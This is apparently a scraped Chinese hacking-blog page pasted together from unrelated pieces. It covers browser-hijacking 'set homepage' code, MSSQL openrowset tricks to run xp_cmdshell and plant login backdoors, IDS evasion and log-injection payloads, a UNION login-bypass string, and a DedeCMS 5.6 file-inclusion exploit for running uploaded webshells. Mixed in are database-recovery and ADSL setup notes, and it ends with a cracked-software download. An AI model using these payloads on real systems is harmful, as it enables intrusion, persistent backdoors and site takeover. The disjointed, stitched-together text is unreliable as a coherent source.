鼠标指向时提示设为首页
将下列代码插入<body>区中：
<A href=www.darkvisitor.org onmouseover=”this.style.behavior=’url(#default#homepage)’;this.setHomePage(http://www.darkvisitor.org ;” target=”_blank”>设为首页</A>

打开页面时自动弹出窗口询问是否设为首页
将以下代码放在<head></head>之间：
<script language=”javascript”>
function myhomepage(){
this.homepage.style.behavior=’url(#default#homepage)’;this.homepage.sethomepage(’http://bbs.itjmz.com’;);
}
</script>
<p align=”center”><a href=”http:netbei.com” name=”homepage”
onclick=”myhomepage();”></a>
再将下面代码加入<body>内：
onload=”myhomepage();”
即：<body onload=”myhomepage();”>
离开时自动提示设为首页
<body onunload=”BASEBody.style.behavior=’url(#default#homepage)’;if(!(BASEBody.isHomePage(’http://bbs.itjmz.com’;)))BASEBody.setHomePage(’http://bbs.itjmz.com/’;);”>
强行设为首页代码
<object data=’http://www.darkvisitor.org/homepage/set.asp?url=http://你的网址;width=’0′ height=’0′>

　　可能这个技巧早有人已经会了，就是利用openrowset发送本地命令。通常我们的用法是(包括MSDN的列子)如下：

　　select * from openrowset(’sqloledb’,'myserver’;’sa’;”,’select * from

　　table’)

　　可见(即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问，它必须跟在select后面，也就是说需要返回一个recordset 。

　　那么我们能不能利用它调用xp_cmdshell呢?答案是肯定的!

　　select * from openrowset(’sqloledb’,’server’;’sa’;”,’set fmtonly off

　　exec master.dbo.xp_cmdshel l ”dir c:”’)

　　必须加上set fmtonly off用来屏蔽默认的只返回列信息的设置，这样xp_cmdshell返回的output集合就会提交给前面的select显示，如果采用默认设置，会返回空集合导致select出错，命令也就无法执行了。

　　那么如果我们要调用sp_addlogin呢，他不会像xp_cmdshell返回任何集合的，我们就不能再依靠fmtonly设置了，可以如下操作

　　select * from openrowset(’sqloledb’,’server’;’sa’;”,’select ”OK!”

　　exec master.dbo.sp_addlogin Hectic’)

　　这样，命令至少会返回select OK!’的集合，你的机器商会显示OK!，同时对方的数据库内也会增加一个Hectic的账号，也就是说，我们利用

　　select ‘OK!’的返回集合欺骗了本地的select请求，是命令能够正常执行，通理sp_addsrvrolemember和opendatasource也可以如此操作!至于这个方法真正的用处，大家慢慢想吧。

　　2.关于Msdasql两次请求的问题

　　不知道大家有没有试过用msdasql连接远程数据库，当然这个api必须是sqlserver的管理员才可以调用，那么如下：

　　select * from openrowset(’msdasql’,'driver={sql

　　server};server=server;address=server,1433;uid=sa;pwd=;database=master;network=dbmssocn’,’s

　　elect * from table1 select * from table2′)

　　当table1和table2的字段数目不相同时，你会发现对方的sqlserver崩溃了，连本地连接都会失败，而系统资源占用一切正常，用pskill杀死 sqlserver进程后，如果不重启机器，sqlserver要么无法正常启动，要么时常出现非法操作，我也只是碰巧找到这个bug的，具体原因我还没有摸透，而且很奇怪的是这个现象只出现在msdasql上，sqloledb就没有这个问题，看来问题不是在于请求集合数目和返回集合数目不匹配上，应该还是msdasql本身的问题，具体原因，大家一起慢慢研究吧。

　　3.可怕的后门

　　以前在网上看到有人说在 sqlserver上留后门可以通过添加triger、jobs或改写sp_addlogin和sp_addsrvrolemember做到，这些方法当然可行，但是很容易会被发现。不知道大家有没有想过sqloledb的本地连接映射。呵呵，比如你在对方的sqlserver上用sqlserver的管理员账号执行如下的命令：

　　select * from openrowset(’sqloledb’,'trusted_connection=yes;data

　　source=Hectic’,’set fmtonly off exec master..xp_cmdshell ”dir c:”’)

　　这样在对方的 sqlserver上建立了一个名为Hectic的本地连接映射，只要sqlserver不重启，这个映射会一直存在下去，至少我现在还不知道如何发现别人放置的连接映射，好了，以上的命令运行过后，你会发现哪怕是sqlserver没有任何权限的guest用户，运行以上这条命令也一样能通过!而且权限是 localsystem!(默认安装)呵呵!这个方法可以用来在以被入侵过获得管理员权限的sqlserver上留下一个后门了。以上的方法在 sqlserver2000 sqlserver2000SP1上通过!

　　另外还有一个猜测，不知道大家有没有注意过windows默认附带的两个dsn，一个是localserver一个是msqi，这两个在建立的时候是本地管理员账号连接sqlserver的，如果对方的 sqlserver是通过自定义的power user启动，那么sa的权限就和power user一样，很难有所大作为，但是我们通过如下的命令：

　　select * from openrowset

　　(’msdasql’,'dsn=locaserver;trusted_connection=yes’,’set fmtonly off exec

　　master..xp_cmdshell ”dir c:”’)

应该可以利用localserver的管理员账号连接本地sqlserver然后再以这个账号的权限执行本地命令了，这是后我想应该能突破sa那个power user权限了。现在的问题是sqloledb无法调用dsn连接，而msdasql非管理员不让调用，所以我现在正在寻找guest调用msdasql 的方法。

　　如果有人知道这个bug如何突破，或有新的想法，我们可以一起讨论一下，这个发放如果能成功被guest利用，将会是一个很严重的安全漏洞。因为我们前面提到的任何sql语句都可以提交给对方的asp去帮我们执行。

　　4.利用T-sql骗过Ids或攻击Ids

　　现在的ids已经变得越来越聪明了。有的ids加入了xp_cmdshell sp_addlogin 的监视，但是毕竟人工智能没有出现的今天，这种监视总是有种骗人的感觉。

　　先说说欺骗Ids

　　ids既然监视xp_cmdshell关键字，那么我们可以这么做：

　　declare @a sysname set @a=”xp_” “cmdshell” exec @a ‘dir c:’

　　这个代码相信大家都能看明白，还有xp_cmdshell作为一个store procedure在master库内有一个id号，固定的，我们也可以这么做：

　　假设这个id=988456

　　declare @a sysname select @a=name from sysobjects where id=988456

　　exec @a ‘dir c:’

　　当然也可以：

　　declare @a sysname select @a=name from sysobjects where id=988455 1

　　exec @a ‘dir c:’

　　这种做法排列组合，ids根本不可能做的到完全监视。同理，sp_addlogin也可以这么做。

　　再说说攻击Ids

　　因为ids数据量很大，日至通常备份到常规数据库，比如sql server。

　　如果用古老的recordset.addnew做法，会严重影响ids的性能，因为通过ado做t-sql请求，不但效率高，而且有一部分工作可以交给sql server 去做，通常程序会这么写：

　　insert table values (’日至内容’，…)

　　那么我们想想看，如果用 temp’) exec xp_cmdshell ‘dir c:’ — 提交后会变成：

　　insert table values (’日至内容’….’temp’) exec xp_cmdshell ‘dir

　　c:’ — ‘)

　　这样，xp_cmdshell就可以在ids的数据库运行了。当然ids是一个嗅叹器，他会抓所有的报，而浏览器提交的时候会把空格变成 。因此， 会被提交到sql server，这样你的命令就无法执行了。 唯一的办法就是：

　　insert/**/table/**/values(’日至内容’….’temp’)/**/exec/**/xp_cmdshell/**/’dir c:’/**/– ‘)

　　用/**/代替空格做间隔符，这样你的t-sql才能在ids的数据库内执行。当然也可以用其他语句，可以破坏，备份ids的数据库到你的共享目录，呵呵。

　　其实这种方法的原理和攻击asp是一样的，只是把空格变成了/**/ 。本来asp是select语句，那么用’就可以屏蔽。现在ids用insert语句，那么用’)屏蔽。

　　好了，其他很多新的入侵语句大家可以自己慢慢想，最好的测试工具就是query analyzer了。

　　<%

　　username=trim(Request.Form(”username”))

　　password=trim(Request.Form(”password”))

　　sql=”Select * FROM admin Where user=’”&username&”‘”

　　Set rs=Server.CreateObject(”adodb.recordset”)

　　rs.Open sql,conn,1,1

　　if rs.eof then

　　checksysUser=FALSE

　　else

　　passwd=trim(rs(”pwd”))

　　if passwd=password then

　　Session(”admin”)=username

　　checksysUser=TRUE

　　else

　　checksysUser=FALSE

　　end if

　　End if

　　rs.close

　　conn.close

　　if checksysUser=true then

　　Response.Redirect(”main.asp”)

　　else

　　errmsg=”<font color=#FF0000><b>用户名输入有误，请重新输入！</b></font>”

　　end if

　　%>

　　先在数据库中查询用户名对应的密码，然后再和用户输入的密码对比，导致’or’='or’这样的万能登陆密码失效。

　　但如果在上面的程序中，用户名输入 程序代码

　　’ UNION Select 1,1,1 FROM admin Where ”=’

　　，密码输入1，就可以登陆成功，原理很简单，就不多说了。

　　顺便附上oldjun的语句：

　　程序代码

　　’ UNION Select 1,1,1 AS pwd FROM admin Where ”=’

    在恢复的时候，最理想的情况就是你的数据文件和日志文件都完好无损了，这样只需要sp_attach_db，把数据文件附加到新的数据库上即可，或者在停机的时候把所有数据文件(一定要有master等)都copy到原有路径下也行，不过一般不推荐这样的做法，sp_attach_db比较好，虽然麻烦许多。

    但是呢，一般数据库崩溃的时候系统是未必能有时间把未完成的事务和脏页等写入磁盘的，这样的情况sp_attach_db就会失败。那么，寄期望于DBA制定了一个良好的灾难恢复计划吧。按照你的恢复计划，还原最新的完全备份，增量备份或者事务日志备份，然后如果你的活动事务日志还能读得出来的话，恭喜你!你可以还原到崩溃前的状态。

    一般的单位都是没有专职的DBA的，如果没有可用的备份，更可能是最近一次备份的时间过于久远而导致不可接受的数据损失，而且你的活动事务日志也处于不可用的状态，那就是最麻烦的情况了。

    不幸的很的是，一般数据库崩溃都是由于存储子系统引起的，而这样的情况是几乎不可能有可用的日志用于恢复的。

    那么就只好试一下这些方案了。当然，是要求至少你的数据文件是存在的，要是数据文件、日志文件和备份都没有了的话，别找我，你可以到楼顶上去唱“神啊，救救我吧”。

    首先，你可以试一下sp_attach_single_file_db，试着恢复一下你的数据文件，虽然能恢复的可能性不大，不过假如这个数据库刚好执行了一个checkpoint的话，还是有可能成功的。

    如果你没有好到有摸彩票的手气，最重要的数据库没有像你期盼的那样attach上去，不要气馁，还是有别的方案的。

    我们可以试着重新建立一个log，先把数据库设置为emergency mode，sysdatabases的status为32768 就表示数据库处于此状态。

    不过系统表是不能随便改的，设置一下先

    Use Master

    Go

    sp_configure ‘allow updates’, 1

    reconfigure with override

    Go

    然后 update sysdatabases set status = 32768 where name = ”

    现在，祈求满天神佛的保佑吧，重新建立一个log文件。成功的机会还是相当大的，系统一般都会认可你新建立的日志。如果没有报告什么错误，现在就可以松一口气了。

    虽然数据是恢复了，可是别以为事情就算完成了，正在进行的事务肯定是丢失了，原来的数据也可能受到一些损坏。

    先把SQL Server 重新启动一下，然后检查你的数据库吧。

    先设置成单用户模式，然后做

    dbcc sp_dboption ”, ’single user’, ‘true’

    DBCC CHECKDB(”)

    如果没有什么大问题就可以把数据库状态改回去了，记得别忘了把系统表的修改选项关掉。update sysdatabases set status = 28 where name = ” ，当然你的数据库状态可能不是这个，自己改为合适的值吧。也可以用

    sp_resetstatus

    go

    sp_configure ‘allow updates’, 0

    reconfigure with override

    Go

    checkdb的时候可能报告有一些错误，这些错误的数据你可能就只好丢弃了。

    checkdb有几种修复选项，自己看着用吧，不过最后你可能还是得REPAIR_ALLOW_DATA_LOSS，完成所有修复。

    chekcdb并不能完成所有的修复，我们需要更进一步的修复，用DBCC CHECKTABLE对每一个表做检查吧。

    表的列表可以用sysobjects里面得到，把OBJECTPROPERTY是IsTable的全部找出来检查一下吧，这样能够基本上解决问题了，如果还报告错误，试着把数据select into到另一张表检查一下。

    这些都做完了之后，把所有索引、视图、存储过程、触发器等重新建立一下。DBCC DBREINDEX也许可以帮你一些忙。

   一、开启ADSL宽带猫的DHCP功能

    一般的ADSL Modem都内置了DHCP功能，这项功能在默认状态下是禁用的，我们可以通过ADSL的设置程序开启DHCP，当Windows XP系统发出IP地址分配请求时，迅速提供可用的IP地址，Windows XP系统就不会出现假死现象。

    下面以东信E700A为例来说明如何开启ADSL的DHCP功能。E700A的IP地址默认为192.168.1.1。首先在网络属性中把网卡的 IP地址设为192.168.1.2。打开IE，在地址栏中输入http://192.168.1.1/，用户名和密码都为root，进入“局域网”中的 “DHCP模式”，在下拉菜单中选择“DHCP Server”，再点击下方的“提交”按钮，接着保存设置并重新启动即可对于我们

    二、给网卡指定固定IP地址

    在“控制面板”中打开“网络连接”窗口，找到与ADSL相连的“本地连接”进入该连接的“属性”窗口，双击“常规”项中的“Internet协议(TCP/IP)”，把网卡的IP地址设为192.168.0.1，子网掩码设为255.255.255.0，网关和DNS为默认设置，最后点击“确定”按钮即可。

   三、开启Windows XP的Internet连接共享

    虽然ADSL只连接了一台电脑，再设置Internet连接共享好像多此一举，但如果开启“Internet连接共享”，Windows XP系统就会变成一个微型的DHCP服务器，它会强行把网卡的IP地址设为192.168.0.1，这一方法和方法1有异曲同工之妙。

那就利用模板上传的功能得Shell，在模板那里新建一个HTM文件，或者上传一个

然后保存，到生成首页文件那里，把上面改成你修改上传的HTM文件，下面改后缀为PHP之后就生成

发布一个文章，上传一个正常图片，修改文章，把实现构造好的图片传上去，构造表单把图片带入模版,预览,主要的是带入模版这一步，我已经能把那个不能显示的图片传上去了,在fck里面传的,但是这个是直接GETshell,5.3—5.6通杀

一、漏洞介绍
Dedecms V5.6 Final版本中的plus/carbuyaction.php文件中当dopost为return时，$code变量没有初始化，直接被带入了require once 语句中，由于后面限制了.php，从而只能导致本地包含漏洞。

二、漏洞细节
1、 plus/carbuyaction.php文件：

//漏洞出现下$dopost 为return的时候，$code变量没有被赋值，由于dedecms的全局机制可以任意给其赋值，从而带入包含，导致本地包含漏洞。

…
elseif($dopost == ‘return’){
//$code直接引入，from www.oldjun.com
require_once DEDEINC.’/payment/’.$code.’.php’;
$pay = new $code;
$msg=$pay->respond();
ShowMsg($msg,”javascript:;”,0,3000);
exit();
}
…
2、 include/common.inc.php：

//无论是否打开magic_quotes_gpc，系统都对传进来的变量进行了addslashes处理，from www.oldjun.com
…
function _RunMagicQuotes(&$svar)
{
if(!get_magic_quotes_gpc())
{
if( is_array($svar) )
{
foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
}
else
{
$svar = addslashes($svar);
}
}
return $svar;
}

//模拟register_globals，对_GET、_POST、_COOKIE全局化，from www.oldjun.com
foreach(Array(’_GET ‘,’_POST’,'_COOKIE’) as $_request)
{
foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);
}
…
三、漏洞利用
1. windows系统：

IIS或者某些apache版本下php文件系统可以进行路径截断，
可以通过
///////////////////////////////////（若干/）
/././././././././././././././././（若干/.）
进行截断。

于是可以上传一个精心构造带有恶意php代码的图片，然后注册一个用户上传，比如上传到uploads/userup/2/12Ka5357-c53.jpg，于是可以通过访问：

http://127.0.0.1/ plus/carbuyaction.php?dopost=return&code=../../uploads/userup/2/12Ka5357-c53.jpg///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////（若干/）

则有可能执行12Ka5357-c53.jpg中的恶意php代码，从而达到入侵的目的。

2.linux系统：

1）apache某些版本php文件系统支持路径截断，于是同windows下，可以通过
///////////////////////////////////（若干/）
/././././././././././././././././（若干/.）
进行截断。

利用方法同windows:

于是可以上传一个精心构造带有恶意php代码的图片，然后注册一个用户上传，比如上传到uploads/userup/2/12Ka5357-c53.jpg，于是可以通过访问：

http://127.0.0.1/ plus/carbuyaction.php?dopost=return&code=../../uploads/userup/2/12Ka5357-c53.jpg///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////（若干/）

则有可能执行12Ka5357-c53.jpg中的恶意php代码，从而达到入侵的目的。

2）旁注攻击

比如目标站是www.aaa.com，漏洞文件是：
http://www.aaa.com/ plus/carbuyaction.php

同服务器有个站点www.bbb.com可以轻松入侵，拿到webshell，但是由于权限控制，www.bbb.com站的webshell访问或者控制不了www.aaa.com，于是我们可以通过这个本地包含漏洞达到入侵www.aaa.com的目的。

1. 通过www.bbb.com上传一个webshell到/tmp文件夹下，比如文件名是shell.php；
2. 访问http://www.aaa.com/plus/carbuyaction.php?code=../../../../../../../tmp/shell则可以成功包含我们上传到临时文件夹下的webshell，由于当前是www.aaa.com的权限，则可以完全控制目标站点：www.aaa.com。

附件下载: 爱聚合6.3.1破解版